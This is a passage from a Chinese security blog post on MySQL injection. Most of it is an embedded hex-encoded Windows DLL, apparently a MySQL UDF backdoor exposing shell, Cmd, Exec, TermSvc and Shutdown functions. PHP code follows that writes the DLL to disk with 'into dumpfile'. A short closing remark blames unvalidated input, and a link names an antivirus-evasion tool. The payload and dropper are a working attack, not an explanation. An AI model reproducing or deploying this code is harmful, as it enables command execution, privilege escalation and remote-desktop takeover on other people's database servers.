C65205465726D696E616C20536572766963652E0D0A2020202020202D7669657720202020202056696577205465726D696E616C20536572766963652053657474696E67732E0D0A2020202020202D70202020202020202020536574204E6577205465726D696E616C205365727669636520506F72742E0D0A6578616D706C653A0D0A2020202020207465726D737663202D71756572790D0A2020202020207465726D737663202D6C6F676F666620310D0A2020202020207465726D737663202D656E61626C65202D7020333339390D0A2020202020207465726D737663202D7020333339390D0A2020202020207465726D737663202D766965770D0A0099210010D1210010E22100100C2200100000000000000000C000000000000046762F0010762F0010762F0010F7230010D5240010F723001099210010D1210010E22100102D2400102E4F4350000000000D0A68656C700D0A436D6420202020202020202D3E0D0A45786563202020202020202D3E0D0A53687574646F776E2020203D3E0D0A70732020202020202020203D3E0D0A5465726D537663202020203D3E0D0A0D0A000000556E6B6E6F776E20436F6D6D616E642E3A28200D0A0D0A005465726D537663007073000073687574646F776E000000004578656300000000436D6400455F4F55544F464D454D4F52590000003F00000068656C7000000000FFFFFFFFFA3000102005931901000000804A0010000000000000000000000000000000008C4B00000000000000000000E24E000034400000844C00000000000000000000004F00002C410000584B00000000000000000000EE4F0000004000009C4C000000000000000000000E50000044410000104C000000000000000000004C500000B84000001C4C000000000000000000002E510000C4400000704C00000000000000000000AA510000184100008C4C00000000000000000000FA510000344100000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000071025365744C6173744572726F7200009E025465726D696E61746550726F6365737300001B00436C6F736548616E646C65001A014765744C6173744572726F7200009602536C65657000DF02577269746546696C6500CE0257616974466F7253696E676C654F626A6563740018025265616446696C650000F9015065656B4E616D65645069706500440043726561746550726F63657373410000500147657453746172747570496E666F41004300437265617465506970650000F70047657443757272656E7450726F63657373006D014765745469636B436F756E740000EF014F70656E50726F63657373003E0147657450726F63416464726573730000C2014C6F61644C696272617279410000D2025769646543686172546F4D756C74694279746500B001496E7465726C6F636B6564496E6372656D656E740000AD01496E7465726C6F636B656444656372656D656E740000D6014D6170566965774F6646696C6500350043726561746546696C654D617070696E67410000B002556E6D6170566965774F6646696C6500120147657446696C6553697A6500570044656C65746546696C654100340043726561746546696C654100630147657454656D7046696C654E616D65410000650147657454656D7050617468410000550044656C657465437269746963616C53656374696F6E00C1014C65617665437269746963616C53656374696F6E00006600456E746572437269746963616C53656374696F6E0000AA01496E697469616C697A65437269746963616C53656374696F6E004B45524E454C33322E646C6C0000D3004578697457696E646F77734578005553455233322E646C6C0000170041646A757374546F6B656E50726976696C6567657300F5004C6F6F6B757050726976696C65676556616C7565410042014F70656E50726F63657373546F6B656E0000EF004C6F6F6B75704163636F756E745369644100D000476574546F6B656E496E666F726D6174696F6E005B01526567436C6F73654B6579007B01526567517565727956616C7565457841000072015265674F70656E4B657945784100860152656753657456616C75654578410000640152656744656C65746556616C7565410071015265674F70656E4B657941005E015265674372656174654B6579410041445641504933322E646C6C00002E00436F496E697469616C697A65457800006F6C6533322E646C6C000B013F3F315F4C6F636B697440737464404051414540585A0000A2003F3F305F4C6F636B697440737464404051414540585A00004D5356435036302E646C6C005753325F33322E646C6C00003D0261746F6900005E02667265650000B202737072696E74660091026D616C6C6F63000059015F6D6273636D70005F015F6D627369636D700000BE027374726C656E00000F003F3F3240594150415849405A0000C502737472737472000099026D656D7365740000E6027763736C656E000049005F5F4378784672616D6548616E646C65720096026D656D636D70000092015F7075726563616C6C00AD027365746C6F63616C6500DC0276737072696E74660000BA027374726370790000C1015F73747269636D7000004D53564352542E646C6C00000F015F696E69747465726D009D005F61646A7573745F6664697600000C004765744D6F64756C65426173654E616D654100000E004765744D6F64756C6546696C654E616D6545784100000400456E756D50726F636573734D6F64756C657300000500456E756D50726F6365737365730050534150492E444C4C000800575453467265654D656D6F7279000C00575453517565727953657373696F6E496E666F726D6174696F6E41000600575453456E756D657261746553657373696F6E73410057545341504933322E646C6C000057494E494E45542E646C6C0000000000000000000000000000000000BFC7514B00000000665200000100000003000000030000004852000054520000605200003314000020140000F4130000725200007852000085520000000001000200546573745544462E646C6C007368656C6C007368656C6C5F6465696E6974007368656C6C5F696E69740000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000D0490010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000140100000F30163039304E305D307330C430F630043110313F3166317C319C31A531BD31F6310F3231323B3242325A327432B332C632D532193336338733A433F833013407340D34293439349634B234C334DB34033510356D357E359D351436CD36D436DC360137373723383238623874389D38B8382B3969398D39AF39E839013A113A403A483A5D3A713A803ACE3ADF3AE53AF33AF83A063B403B503B693B723B823B8B3B9B3BA43BE43B033C123C1B3C203C263C2D3C343C4A3C533C583C5E3C653C6C3CA53CAB3CC43C333D443D683D6F3D7C3D833D9F3DFC3D013E1E3E2C3E4F3E553E803E9E3EA33EC63EEF3EF63E023F203F403F573F603F713F813F8C3F963FBF3FC53FDC3FF63FFF3F000000200000F0000000283051305830653076308E30B230D230E130F53012312C3146315D317231A431DB31EE3116323C32533268328532A832B332BE32D432F43245336D33B633BB33C233C933CF33143456345D34663475349E34A4341935413555358435AE35C335D5350C36473675369336BC36EE368B37B637F0383739E839EE39F639FD39093A123A263A6A3A713A913AD03BD63BDE3BE43BEE3B123C9A3CBA3CF63C3C3D873D953D9E3DB13DD33DDD3D013E1F3E3D3E5B3E7E3E8E3EB83ECD3ED43EF03EF63EFC3E023F423F723F783F7E3F8C3F943F9A3FA53FB23FBA3FC83FCD3FD23FD73FE23FEF3FF93F000000300000280000000E301A30203042305430B030CC30D230D830DE30E430EA30F030F63003310000004000002C00000098318039843988398C39A039A439A839AC39B039B439B839BC39C039C439843A903A0000006000000C00000014300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000,CHAR))');
    if (mysql_errno($conn) != 0) {
        echo mysql_error().'<br/>';
        mysql_close($conn);
        exit();
    }
    mysql_query('select c from udftmp into dumpfile "'.$path.'"');
    if (mysql_errno($conn) != 0) {
        echo mysql_error(). '<br/>';
        mysql_query('drop table udftmp');
        mysql_close($conn);
        exit();
    }
    mysql_query('drop table udftmp');
    if (mysql_errno($conn) !=0)
        echo 'Dump DLL Failed.'.mysql_error();
    else
        echo 'Dump DLL Success!';
    mysql_close($conn);
}
?>
</body>
</html>

总结

注入产生原因就是对用户输入的数据未进行严格校验,导致可以构造恶意语句。

本篇文章仅仅介绍MYSQL的基础。

所有原创文章采用 知识共享署名-非商业性使用 4.0 国际许可协议 进行许可。
您可以自由的转载和修改,但请务必注明文章来源并且不可用于商业目的。
本站部分内容收集于互联网,如果有侵权内容、不妥之处,请联系我们删除。敬请谅解!

  Previous post PowerShell免杀工具 xencrypt
Next post   常用Proxy小结

评论已关闭

只有脚踏实地的人,才能够说:路,就在我的脚下。

无论你选择做什么,追求完美的程度决定你成就的高度。

这个世界最脆弱的是生命,身体健康,很重要。

上帝说:你要什么便取什么,但是要付出相当的代价。

现在站在什么地方不重要,重要的是你往什么方向移动。